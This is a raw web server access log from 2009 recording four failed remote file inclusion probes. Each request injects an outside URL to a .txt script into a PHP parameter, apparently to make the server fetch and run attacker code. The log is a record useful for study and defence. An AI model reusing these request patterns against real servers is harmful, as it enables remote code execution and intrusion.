213.79.101.98 - - [13/Nov/2009:01:45:16 -0500] "GET /logs/access_log.Q109072200%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:45:17 -0500] "GET /logs/access_log.Q109091400%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:45:17 -0500] "GET /logs/access_log.Q109072200%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.54.243 - - [13/Nov/2009:01:45:18 -0500] "GET /logs/access_log.Q109081600%20%20//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
